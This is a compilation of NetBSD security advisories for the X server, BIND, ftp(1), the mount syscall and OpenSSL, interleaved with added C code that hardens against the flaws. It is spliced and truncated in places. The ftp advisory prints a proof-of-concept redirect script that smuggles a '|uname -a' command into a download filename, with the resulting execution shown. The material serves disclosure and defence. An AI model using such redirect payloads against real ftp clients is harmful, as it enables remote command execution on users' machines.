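#include <stdlib.h>
#include <string.h>

struct toybuf {
    unsigned char *data;
    size_t len;          /* bytes in use */
    size_t cap;          /* bytes allocated */
};

/* The flaw: len + datlen wraps to a small number, so the buffer is grown
 * far too little and the memcpy of datlen bytes that follows runs off
 * the end of the heap block. */
static size_t unchecked_new_len(const struct toybuf *b, size_t datlen)
{
    return b->len + datlen;              /* wraps when datlen > SIZE_MAX - len */
}

/* Hardened: refuse any addition whose sum does not fit in size_t, and
 * also anything above a caller-chosen bound (the "sanitize user-supplied
 * sizes" part the advisory asks of the program). */
static int toybuf_expand(struct toybuf *b, size_t datlen, size_t max_total)
{
    if (datlen > SIZE_MAX - b->len)
        return -1;                       /* sum would wrap */
    size_t need = b->len + datlen;
    if (need > max_total)
        return -1;                       /* policy bound on untrusted sizes */
    if (need <= b->cap)
        return 0;
    size_t newcap = b->cap ? b->cap : 64;
    while (newcap < need) {
        if (newcap > SIZE_MAX / 2) {     /* doubling would itself overflow */
            newcap = need;
            break;
        }
        newcap *= 2;
    }
    unsigned char *p = realloc(b->data, newcap);
    if (p == NULL)
        return -1;
    b->data = p;
    b->cap = newcap;
    return 0;
}

/* Append datlen bytes; fails closed instead of writing past the block. */
static int toybuf_add(struct toybuf *b, const void *src, size_t datlen, size_t max_total)
{
    if (toybuf_expand(b, datlen, max_total) != 0)
        return -1;
    memcpy(b->data + b->len, src, datlen);
    b->len += datlen;
    return 0;
}

static void toybuf_free(struct toybuf *b)
{
    free(b->data);
    b->data = NULL;
    b->len = b->cap = 0;
}
```

The `datlen > SIZE_MAX - b->len` form is the one to use: writing `b->len + datlen < b->len` relies on unsigned wraparound and is easy to get wrong once intermediate values are widened or signed.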
NetBSD Security Advisory 2015-001: Protocol handling issues in X Window System servers
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2015-001
                 =================================

Topic:          Protocol handling issues in X Window System servers

Version:        NetBSD-current:         affected prior to 2014-12-22
                NetBSD 7_BETA*:         affected
                NetBSD 6.1*:            affected
                NetBSD 6.0*:            affected
                NetBSD 5.2*:            affected
                NetBSD 5.1*:            affected
                pkgsrc:                 x11/xorg-server package prior to 1.12.4nb7

Severity:       Local Privilege Escalation, Arbitrary Code Execution

Fixed:          NetBSD-current:         December 22nd, 2014
                NetBSD-7 branch:        December 22nd, 2014
                NetBSD-6 branch:        December 22nd, 2014
                NetBSD-6-1 branch:      December 22nd, 2014
                NetBSD-6-0 branch:      December 22nd, 2014
                NetBSD-5 branch:        December 22nd, 2014
                NetBSD-5-2 branch:      December 22nd, 2014
                NetBSD-5-1 branch:      December 22nd, 2014
                pkgsrc 2014Q4:          xorg-server-1.12.4nb7 corrects this issue

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A large number of issues in the way the Xorg server processes requests
have been discovered by Ilja van Sprundel, a security researcher with
IOActive. These issues could allow local users the ability to attack a
setuid Xorg server. These problems are documented in CVE-2014-8091 to
CVE-2014-8103.

  http://www.x.org/wiki/Development/Security/Advisory-2014-12-09/

Additionally, CVE-2013-6424 is also fixed with these updates.
Technical Details
=================

The issues come in 3 main categories:

- Denial of service due to unchecked malloc in client authentication
        CVE-2014-8091: SUN-DES-1

- Integer overflows calculating memory needs for requests
        CVE-2014-8092: X11 core protocol requests
        CVE-2014-8093: GLX extension
        CVE-2014-8094: DRI2 extension
        CVE-2013-6424: EXA and render extensions

- Out of bounds access due to not validating length or offset values
  in requests
        CVE-2014-8095: XInput extension
        CVE-2014-8096: XC-MISC extension
        CVE-2014-8097: DBE extension
        CVE-2014-8098: GLX extension
        CVE-2014-8099: XVideo extension
        CVE-2014-8100: Render extension
        CVE-2014-8101: RandR extension
        CVE-2014-8102: XFixes extension
        CVE-2014-8103: DRI3 Present extensions


Solutions and Workarounds
=========================

To apply a fixed version from a releng build, fetch a fitting
xserver.tgz from nyftp.netbsd.org and extract the fixed binaries:

        cd /var/tmp
        ftp http://nyftp.netbsd.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/xserver.tgz
        cd /
        tar xzpf /var/tmp/xserver.tgz ./usr/X11R?/bin/X\*
        tar xzpf /var/tmp/xserver.tgz ./usr/X11R?/lib/modules/extensions

as well as architecture-specific X servers, with the following
replacements:

        REL   = the release version you are using
        BUILD = the source date of the build. 20141223* and later will fit
        ARCH  = your system's architecture

The following instructions describe how to upgrade your Xorg server
binaries by updating your source tree and rebuilding and installing a
new version of Xorg server.

* NetBSD-current:

Systems running NetBSD-current dated from before 2014-12-21 should be
upgraded to NetBSD-current dated 2014-12-22 or later.
The following files/directories need to be updated from the
netbsd-current CVS branch (aka HEAD):

        xsrc/external/mit/xorg-server/dist
        xsrc/xfree/xc/programs/Xserver

To update from CVS, re-build, and re-install Xorg server:

        # cd xsrc
        # cvs update -d -P external/mit/xorg-server/dist
        # cd ..
        # cd src
        # cd external/mit/xorg/server/xorg-server
        # make USETOOLS=no cleandir dependall
        # make USETOOLS=no install

For the acorn32, alpha, amiga, mac68k, pmax and sun3 ports, the
following instructions should be used:

        # cd xsrc
        # cvs update -d -P xfree/xc/programs/Xserver
        # cd ..
        # cd src
        # cd x11/Xserver
        # make USETOOLS=no cleandir dependall
        # make USETOOLS=no install

* NetBSD 6.*:

Systems running NetBSD 6.* sources dated from before 2014-12-21 should
be upgraded from NetBSD 6.* sources dated 2014-12-22 or later.

The following files/directories
NetBSD Security Advisory 2015-002: bind Denial of Service (CVE-2014-8500)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2015-002
                 =================================

Topic:          bind Denial of Service (CVE-2014-8500)

Version:        NetBSD-current:         source prior to Dec 10, 2014
                NetBSD 7 Beta:          affected
                NetBSD 6.1:             affected
                NetBSD 6.0:             affected
                NetBSD 5.2:             affected
                NetBSD 5.1:             affected

Severity:       Denial of Service

Fixed:          NetBSD-current:         Dec 11, 2014
                NetBSD-7 branch:        Jan 06, 2015
                NetBSD-6 branch:        Jan 06, 2015
                NetBSD-6-1 branch:      Jan 06, 2015
                NetBSD-6-0 branch:      Jan 06, 2015
                NetBSD-5 branch:        Dec 26, 2014
                NetBSD-5-2 branch:      Dec 26, 2014
                NetBSD-5-1 branch:      Dec 26, 2014

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A lack of defense against arbitrarily long delegation chains can be
exploited to crash bind. This primarily concerns resolvers that resolve
third-party controlled domains; authoritative servers can only be
affected if an attacker can control a delegation that the authoritative
server needs to traverse to service the zone.

This vulnerability has been assigned CVE-2014-8500.


Technical Details
=================

By making use of maliciously-constructed zones or a rogue server, an
attacker can exploit an oversight in the code BIND uses to follow
delegations in the Domain Name Service, causing BIND to issue unlimited
queries in an attempt to follow the delegation. This can lead to
resource exhaustion and denial of service (up to and including
termination of the named server process.)

The fix introduces a config setting to determine at which length named
will stop following the delegation chain and return a failure instead.


Solutions and Workarounds
=========================

There is no practical workaround (the impractical is not to try to
resolve malicious zones).

Solutions:

+ Install and use a bind package from pkgsrc.
+ Update named from a daily build later than the fix date:

  fetch from http://nyftp.NetBSD.org/pub/NetBSD-daily/branch/date/arch/
  the file binary/sets/base.tgz

  for all releases:

        cd /
        tar xzpf base.tgz-path ./usr/sbin/named \
                ./usr/lib/libbind9.so\* \
                ./usr/lib/libisc.so\* \
                ./usr/lib/libdns.so\* \
                ./usr/lib/libisccfg.so\* \
                ./usr/lib/liblwres.so\* \
                ./usr/lib/libisccc.so\*

  If you use debug or profiling libraries or build static binaries with
  bind libs, also install the updated versions from the comp.tgz or
  debug.tgz.

+ Rebuild your system with the fixes applied.

  NetBSD-current, NetBSD-7, NetBSD-6:

  For better maintainability bind was updated to the latest ISC release
  of the bind branch. This means updating just the files containing the
  vulnerable code won't work. Updating src/external/bsd/bind also won't
  be enough since all the bind libraries got version bumps, and
  src/distrib/sets/lists/* will also need selective updates. For this
  reason, updating the entire src tree and recompiling is recommended.
  NetBSD-5: fixed versions are (relative to src/dist/bind):

  File                              netbsd-5        netbsd-5-2          netbsd-5-1
  ----                              --------        ----------          ----------
  bin/named/config.c                1.1.1.8.4.5     1.1.1.8.4.4.2.1     1.1.1.8.4.1.2.4
  bin/named/query.c                 1.8.4.9         1.8.4.7.2.2         1.8.4.2.2.7
  bin/named/server.c                1.1.1.9.4.5     1.1.1.9.4.4.2.1     1.1.1.9.4.1.2.4
  lib/dns/adb.c                     1.6.4.5         1.6.4.4.2.1         1.6.4.1.2.4
  lib/dns/resolver.c                1.8.4.7         1.8.4.6.2.1         1.8.4.2.2.5
  lib/dns/include/dns/adb.h         1.1.1.5.4.4     1.1.1.5.4.3.2.1     1.1.1.5.12.4
  lib/dns/include/dns/resolver.h    1.1.1.5.4.5     1.1.1.5.4.4.2.1     1.1.1.5.4.1.2.4
  lib/export/isc/Makefile.in        1.1.2.4         1.1.2.3.2.1         1.1.4.5
  lib/isc/Makefile.in               1.1.1.6.4.5     1.1.1.6.4.4.2.1     1.1.1.6.4.1.2.4
  lib/isc/include/isc/Makefile.in   1.1.1.5.4.5     1.1.1.5.4.4.2.1     1.1.1.5.4.1.2.4
  lib/isc/include/isc/types.h       1.1.1.5.4.5     1.1.1.5.4.4.2.1     1.1.1.5.4.1.2.4
  lib/isccfg/namedconf.c            1.1.1.7.4.5     1.1.1.7.4.4.2.1     1.1.1.7.4.1.2.4
  lib/isc/counter.c                 1.1.2.1         1.1.4.2             1.1.6.2
  lib/isc/include/isc/counter.h     1.1.2.1         1.1.4.2             1.1.6.2

  supporting files:

  src/lib/libisc/Makefile           1.2.4.3         1.2.4.2.2.1         1.2.4.1.2.2
  src/usr.sbin/bind/Makefile.inc    1.32.4.2        1.32.4.1.2.1        1.32.12.2

  To update from CVS, re-build and re-install the system:

        # cd src
        # cvs update -d -P -r VERSION FILE
        # cd lib/isc
        # make USETOOLS=no cleandir dependall
        # make USETOOLS=no install
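The Technical Details of this advisory describe a resolver chasing a delegation chain with no upper bound, and a fix that stops after a configured length. The following is an added example, not BIND's code and not from the advisory: a toy iterative resolver over a constructed zone table, where any name of the form `evil<N>` answers with a referral to `evil<N+1>`, so the chain never ends. The `max_depth` parameter, the zone names and addresses, and the cap of 7 used in `main` are this example's choices; BIND's real setting is a named.conf option and its default is not reproduced here.

```c
/* Added example, not BIND's code: a toy resolver that follows delegations
 * with a bound of the kind the CVE-2014-8500 fix introduces. Zone data is
 * constructed for the example; "evil<N>" always refers to "evil<N+1>". */
#include <stdio.h>
#include <string.h>

enum { R_ANSWER, R_REFERRAL, R_NXDOMAIN, R_SERVFAIL };

struct rr { const char *name; int kind; const char *target; };

static const struct rr zones[] = {
    { "www.good",      R_REFERRAL, "ns.good" },        /* one hop, then an address */
    { "ns.good",       R_ANSWER,   "192.0.2.1" },
    { "deep.good",     R_REFERRAL, "ns1.deep.good" },  /* two hops, still legitimate */
    { "ns1.deep.good", R_REFERRAL, "ns2.deep.good" },
    { "ns2.deep.good", R_ANSWER,   "192.0.2.2" },
};

/* One upstream query. Fills target with the address (R_ANSWER) or with
 * the nameserver name that must be resolved next (R_REFERRAL). */
static int query(const char *name, char *target, size_t tlen)
{
    for (size_t i = 0; i < sizeof zones / sizeof zones[0]; i++) {
        if (strcmp(zones[i].name, name) == 0) {
            snprintf(target, tlen, "%s", zones[i].target);
            return zones[i].kind;
        }
    }
    unsigned n;
    if (sscanf(name, "evil%u", &n) == 1) {       /* attacker-controlled zone */
        snprintf(target, tlen, "evil%u", n + 1);  /* never an answer, always onward */
        return R_REFERRAL;
    }
    return R_NXDOMAIN;
}

struct result {
    int kind;           /* R_ANSWER, R_NXDOMAIN or R_SERVFAIL */
    unsigned fetches;   /* upstream queries issued: the resource being exhausted */
    char answer[32];
};

/* Follow referrals starting at name. At most max_depth delegations are
 * chased before giving up with SERVFAIL. The pre-fix behaviour is this
 * same loop without the bound, which on "evil0" never terminates. */
static struct result resolve(const char *name, unsigned max_depth)
{
    struct result r = { R_SERVFAIL, 0, "" };
    char cur[64], next[64];
    snprintf(cur, sizeof cur, "%s", name);
    for (unsigned depth = 0; depth <= max_depth; depth++) {
        r.fetches++;
        int kind = query(cur, next, sizeof next);
        if (kind == R_ANSWER)
            snprintf(r.answer, sizeof r.answer, "%s", next);
        if (kind != R_REFERRAL) {
            r.kind = kind;
            return r;
        }
        snprintf(cur, sizeof cur, "%s", next);    /* chase the delegation */
    }
    r.kind = R_SERVFAIL;                          /* chain too long: stop */
    return r;
}

int main(void)
{
    const char *names[] = { "www.good", "deep.good", "evil0" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        struct result r = resolve(names[i], 7);
        printf("%-10s depth<=7: %s after %u queries %s\n", names[i],
               r.kind == R_ANSWER ? "answer" :
               r.kind == R_NXDOMAIN ? "NXDOMAIN" : "SERVFAIL",
               r.fetches, r.answer);
    }
    return 0;
}
```

Raising `max_depth` shows why the bound matters: the query count for `evil0` grows linearly with it and is paid on every lookup the attacker can trigger, while legitimate names resolve in two or three queries regardless.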
NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-013
                 =================================

Topic:          ftp(1) can be made to execute arbitrary commands by a
                malicious webserver

Version:        NetBSD-current:         source prior to Oct 27th, 2014
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected
                pkgsrc (net/tnftp):     affected

Severity:       remote command execution

Fixed:          NetBSD-current:         Oct 26th, 2014
                NetBSD-7 branch:        Oct 26th, 2014
                NetBSD-6-0 branch:      Oct 27th, 2014
                NetBSD-6-1 branch:      Oct 27th, 2014
                NetBSD-6 branch:        Oct 27th, 2014
                NetBSD-5-2 branch:      Oct 27th, 2014
                NetBSD-5-1 branch:      Oct 27th, 2014
                NetBSD-5 branch:        Oct 27th, 2014
                pkgsrc:                 in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A malicious http server can cause ftp(1) to execute arbitrary commands.

This vulnerability has been assigned CVE-2014-8517.


Technical Details
=================

If the ftp(1) program is used to act as http client and fetch data from
a website, and no output file is passed via the -o argument, the client
can be tricked into executing arbitrary commands.

When acting as http client, the ftp(1) program will follow http
redirects, and uses the part of the path after the last '/' from the
last resource it accesses as the output filename (as long as -o filename
is not specified). After the output filename is resolved by the ftp
client, if the resulting output filename begins with a '|', the output
filename is passed to popen(3). Thus, a malicious web site could hide
'|command' in a redirect and make the client execute 'command' when ftp
fetched that URL.
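The paragraph above describes two steps: deriving the output name from the final URL, and handing a '|'-prefixed name to popen(3). The following is an added example, not ftp(1)'s source and not from the advisory: it reproduces the name derivation (text after the last '/', percent-decoded) and puts the policy the advisory describes next to a hardened one in which '|' only has meaning for a name the user gave with -o. The function names, the OUT_REJECT outcome for a server-derived '|' name, and the extra rejection of names that decode to a path component (such as "%2F") or to "." or ".." are this example's own choices; the advisory only says ftp(1) was changed to use | commands for user-supplied names.

```c
/* Added example, not the ftp(1) source: derive the output filename the way
 * the advisory describes and compare the vulnerable policy (any leading '|'
 * means popen(3)) with a hardened one ('|' honoured only for a -o name). */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum outmode { OUT_FILE, OUT_PIPE, OUT_REJECT };

/* Percent-decode src into dst; -1 on a malformed escape or overflow. */
static int pct_decode(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    for (const char *p = src; *p != '\0'; p++) {
        if (o + 1 >= dstlen)
            return -1;
        if (*p == '%') {
            if (!isxdigit((unsigned char)p[1]) || !isxdigit((unsigned char)p[2]))
                return -1;
            char hex[3] = { p[1], p[2], '\0' };
            dst[o++] = (char)strtol(hex, NULL, 16);
            p += 2;
        } else {
            dst[o++] = *p;
        }
    }
    dst[o] = '\0';
    return 0;
}

/* The name picked when no -o is given: whatever follows the last '/'. */
static int derive_name(const char *url, char *out, size_t outlen)
{
    const char *slash = strrchr(url, '/');
    const char *base = slash != NULL ? slash + 1 : url;
    if (*base == '\0')
        return -1;                       /* URL ends in '/': nothing to name */
    return pct_decode(base, out, outlen);
}

/* Behaviour described in the advisory: a leading '|' means popen(3),
 * whether the name came from the user or from a redirect. */
static enum outmode vulnerable_policy(const char *name)
{
    return name[0] == '|' ? OUT_PIPE : OUT_FILE;
}

/* Hardened (this example's policy): '|' is honoured only for a -o name.
 * A server-derived name that starts with '|' is rejected, as is one that
 * decodes to a path separator or to "." / "..". */
static enum outmode hardened_policy(const char *name, int user_supplied)
{
    if (user_supplied)
        return name[0] == '|' ? OUT_PIPE : OUT_FILE;
    if (name[0] == '|')
        return OUT_REJECT;
    if (strchr(name, '/') != NULL || strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return OUT_REJECT;
    return OUT_FILE;
}

/* Decide what to do with the final (post-redirect) URL under either policy.
 * user_outfile is the -o argument or NULL; the chosen name is left in name. */
static enum outmode decide(const char *final_url, const char *user_outfile,
                           int hardened, char *name, size_t namelen)
{
    int user_supplied = user_outfile != NULL;
    if (user_supplied)
        snprintf(name, namelen, "%s", user_outfile);
    else if (derive_name(final_url, name, namelen) != 0)
        return OUT_REJECT;
    return hardened ? hardened_policy(name, user_supplied)
                    : vulnerable_policy(name);
}

int main(void)
{
    /* the redirect target from the advisory's demonstration */
    const char *url = "http://192.168.2.19/cgi-bin/|uname%20-a";
    char name[256];
    enum outmode m = decide(url, NULL, 0, name, sizeof name);
    printf("vulnerable: \"%s\" -> %s\n", name, m == OUT_PIPE ? "popen" : "file");
    m = decide(url, NULL, 1, name, sizeof name);
    printf("hardened:   \"%s\" -> %s\n", name, m == OUT_REJECT ? "rejected" : "file");
    return 0;
}
```

The decoded name for the advisory's URL is `|uname -a`; under the vulnerable policy that string reaches popen(3), under the hardened one it is refused because it did not come from -o.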
        a20$ pwd
        /var/www/cgi-bin
        a20$ ls -l
        total 4
        -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
        -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
        a20$ cat redirect
        #!/bin/sh
        echo 'Status: 302 Found'
        echo 'Content-Type: text/html'
        echo 'Connection: keep-alive'
        echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
        echo
        a20$
        a20$ ftp http://localhost/cgi-bin/redirect
        Trying ::1:80 ...
        ftp: Can't connect to `::1:80': Connection refused
        Trying 127.0.0.1:80 ...
        Requesting http://localhost/cgi-bin/redirect
        Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
        Requesting http://192.168.2.19/cgi-bin/|uname%20-a
            32      101.46 KiB/s
        32 bytes retrieved in 00:00 (78.51 KiB/s)
        NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
        a20$


Solutions and Workarounds
=========================

Workaround: specifying an output filename by using ftp -o filename
circumvents the issue.

Solution: Get a new ftp binary:

        VERS being your NetBSD version
        DATE being a build date past the fix date for your version
        ARCH being your machine architecture

        ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
        cd /
        tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

or build a new ftp binary from source.

        Affected file: src/usr.bin/ftp/fetch.c

        Fixed versions:
                HEAD            1.206
                netbsd-7        1.205.4.1
                netbsd-6        1.195.2.2
                netbsd-6-1      1.195.8.1
                netbsd-6-0      1.195.6.1
                netbsd-5        1.185.6.3
                netbsd-5-2      1.185.6.2.4.1
                netbsd-5-1      1.185.14.1


Thanks To
=========

Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.


Revision History
================

        2014-11-03      Initial release


More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .


Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (NetBSD)

iQIcBAEBAgAGBQJUV/DOAAoJEAZJc6xMSnBuWXsP/0JHubPskhuwiD04WK3QKqxS
7pI2767yoGuXQwdzEiIYiy2h3Fu8nc/ajLEeUwBn4opEI2tXOTkspjdMO+zqFN+Z
NetBSD Security Advisory 2014-014: Multiple vulnerabilities in the mount system call
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-014
                 =================================

Topic:          Multiple vulnerabilities in the mount system call

Version:        NetBSD-current:         source prior to Sun, Apr 20th 2014
                NetBSD 6.1.5:           not affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0.6:           not affected
                NetBSD 6.0 - 6.0.5:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected

Severity:       Local DoS

Fixed:          NetBSD-current:         Sun, Apr 20th 2014
                NetBSD-6-0 branch:      Mon, 21 Apr 2014
                NetBSD-6-1 branch:      Mon, 21 Apr 2014
                NetBSD-6 branch:        Mon, 21 Apr 2014
                NetBSD-5-2 branch:      Tue, 29 Apr 2014
                NetBSD-5-1 branch:      Tue, 29 Apr 2014
                NetBSD-5 branch:        Sat, 26 Apr 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Due to:
        - missing input validation checks in the mount syscall
        - a wrong assumption on the file systems side
        - a memory corruption bug

the kernel could:
        - allocate an unbounded or zero-sized memory buffer
        - dereference a NULL pointer
        - behave unexpectedly


Technical Details
=================

The mount syscall takes as fourth and fifth arguments an input buffer
and its size. A kernel buffer of the same size is allocated via kmem,
and is then handed over to the appropriate file system. This buffer is
then freed when no longer needed.

The checks on the size of the kernel-allocated buffer were not strict
enough, and a local user could easily make the kernel perform a
zero-sized or unbounded memory allocation, resulting in a crash.

Also, in particular cases, the buffer pointer given to the underlying
file systems is allowed to be NULL - some file systems don't need it.
The others didn't explicitly check for NULL, and were wrongly making the
assumption that it was always a valid, readable buffer, causing the
kernel to panic with a page fault.

Finally, a bug could corrupt memory when freeing the kernel-allocated
buffer.
The buffer is freed via kmem_free, whose second argument indicates the size of the allocated buffer. This size was held by a local variable which was modified by the underlying file systems, thus creating a memory inconsistency when freeing which could lead to a crash or unexpected behavior. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: files relative to src/sys/fs/: HEAD netbsd-6 netbsd-6-1netbsd-6-0netbsd-5 netbsd-5-2netbsd-5-1 ---- ---- adosfs/advfsops.c 1.70 1.63.6.1 1.63.12.1 1.63.10.1 1.53.6.1 1.53.20.1 1.53.16.1 cd9660/cd9660_vfsops.c 1.84 1.74.6.1 1.74.12.1 1.74.10.1 1.63.6.2 1.63.6.1.6.1 1.63.6.1.2.1 efs/efs_vfsops.c 1.25 1.22.8.1 1.22.14.1 1.22.12.1 1.16.4.2 1.16.4.1.10.1 1.16.4.1.6.1 filecorefs/filecore_vfsops.c 1.76 1.68.6.1 1.68.12.1 1.68.10.1 1.55.6.1 1.55.20.1 1.55.16.1 hfs/hfs_vfsops.c 1.31 1.27.8.2 1.27.8.1.6.1 1.27.8.1.4.1 1.19.4.1 1.19.16.1 1.19.12.1 msdosfs/msdosfs_vfsops.c 1.107 1.93.6.2 1.93.6.1.6.1 1.93.6.1.4.1 1.68.6.3 1.68.6.2.10.1 1.68.6.2.6.1 nilfs/nilfs_vfsops.c 1.16 1.8.6.1 1.8.12.1 1.8.10.1 n/an/a n/a ntfs/ntfs_vfsops.c 1.94 1.87.6.1 1.87.20.1 1.87.12.1 1.72.6.2 1.72.6.1.6.1 1.72.6.1.2.1 ptyfs/ptyfs_vfsops.c 1.50 1.42.18.2 1.42.18.1.4.1 1.42.18.1.2.1 1.37.4.1 1.37.18.1 1.37.14.1 puffs/puffs_vfsops.c 1.110 1.100.8.3 1.100.8.2.6.1 1.100.8.2.4.1 1.81.8.4 1.81.8.3.2.1 1.81.8.1.2.1 smbfs/smbfs_vfsops.c 1.100 1.95.8.1 1.95.22.1 1.95.14.1 1.85.4.2 1.85.4.1.6.1 1.85.4.1.2.1 sysvbfs/sysvbfs_vfsops.c 1.43 1.38.6.2 1.38.6.1.6.1 1.38.6.1.4.1 1.26.4.1 1.26.18.1 1.26.14.1 tmpfs/tmpfs_vfsops.c 1.59 
1.52.8.1 1.52.22.1 1.52.14.1 1.44.4.1 1.44.22.1 1.44.18.1 udf/udf_vfsops.c 1.67 1.62.6.1 1.62.12.1 1.62.10.1 1.52.2.4 1.52.2.3.6.1 1.52.2.3.2.1 union/union_vfsops.c
NetBSD Security Advisory 2014-015: OpenSSL and SSLv3 vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-015
                 =================================

Topic:          OpenSSL and SSLv3 vulnerabilities

Version:        NetBSD-current:         source prior to Oct 18th, 2014
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected

Severity:       confidentiality breach, remote DoS

Fixed:          NetBSD-current:         Oct 17th, 2014
                NetBSD-7 branch:        Oct 19th, 2014
                NetBSD-6-0 branch:      Oct 26th, 2014
                NetBSD-6-1 branch:      Oct 26th, 2014
                NetBSD-6 branch:        Oct 26th, 2014
                NetBSD-5-2 branch:      Oct 19th, 2014
                NetBSD-5-1 branch:      Oct 19th, 2014
                NetBSD-5 branch:        Oct 19th, 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

This advisory covers the OpenSSL Security Advisory of Oct 15th, 2014,
which lists four different vulnerabilities:

 - SRTP Memory Leak (CVE-2014-3513), a remotely DoSable memory leak
   (not present in NetBSD 5.*)

 - Session Ticket Memory Leak (CVE-2014-3567), a remotely DoSable
   memory leak

 - SSLv3 has recently been shown to be breakable by an attacker able to
   intercept the data stream between the communication partners (POODLE,
   CVE-2014-3566). OpenSSL has added a mitigation mechanism:
   SSL 3.0 Fallback protection - add support for TLS_FALLBACK_SCSV, which
   signals not to do downgrades to SSLv3 from TLS

 - Build option no-ssl3 is incomplete (CVE-2014-3568): OpenSSL explicitly
   built with no SSLv3 support would still use this protocol as a
   fallback.

Technical Details
=================

See https://en.wikipedia.org/wiki/POODLE for the SSLv3 protocol
vulnerability and http://www.openssl.org/news/secadv_20141015.txt for
the OpenSSL issues.

Solutions and Workarounds
=========================

Disable SSLv3 in servers and clients.

Update the OpenSSL libraries so the prohibition of SSLv3 actually works.
Make sure the old libssl is no longer in use. While the issue is only in
libssl, unrelated source changes make it advisable to update libcrypto as
well.

From source:
------------

Update src and rebuild and install.

Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to
version 1.0.1j; updating the entire src tree is recommended.

From tarballs:
--------------

To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz
from a daily build later than the fix dates, from
http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/
with a date later than the fix date for your branch as listed above,
and your release version and architecture (e.g.
http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201410250200Z/amd64/binary/sets/),
and then extract the files:

Shared libraries:
        tar xzpf base.tgz \*libssl\* \*libcrypto\*

And static libraries and linker config files:
        tar xzpf comp.tgz \*libssl\* \*libcrypto\*

Get the fixed library into use
------------------------------

Since the vulnerability is in a shared library, getting the old library
purged and the fixed one into use requires restarting all programs that
load libssl. The easiest way to do this is to reboot the system.

Another method: using /bin/sh,

        ps ax -o pid | (while read pid; do \
                pmap $pid | egrep '(libssl|libcrypto)' && echo found $pid ;\
        done)

will find non-chrooted programs that have the affected libraries open;
restart them. sshd will not show up in this list since it runs chrooted
and re-exec'ed, but also needs to be restarted.

ldd programname will show the shared libraries a program will want to use.

Fixed versions, code only; note that updating only these files will not
work due to additional changes, but updating the subdirectories, e.g.
from anoncvs, will:

relative to src/crypto/external/bsd/openssl/dist:

File                        HEAD    netbsd-7
----                        ----    --------
apps/s_client.c             1.7     1.6.2.1
crypto/err/openssl.ec       1.2     1.1.1.1.26.1
ssl/d1_lib.c                1.2     1.1.1.6.2.1
ssl/d1_srtp.c               1.2     1.1.1.2.10.1
ssl/dtls1.h                 1.2     1.1.1.5.10.1
ssl/s23_clnt.c              1.7     1.6.2.1
ssl/s23_srvr.c              1.2     1.1.1.4.2.1
ssl/s2_lib.c                1.2     1.1.1.2.2.1
ssl/s3_enc.c                1.7     1.6.2.1
ssl/s3_lib.c                1.12    1.11.2.1
ssl/ssl.h                   1.9     1.8.2.1
ssl/ssl3.h                  1.7     1.6.2.1
ssl/ssl_err.c               1.7     1.6.2.1
ssl/ssl_lib.c               1.2     1.1.1.9.2.1
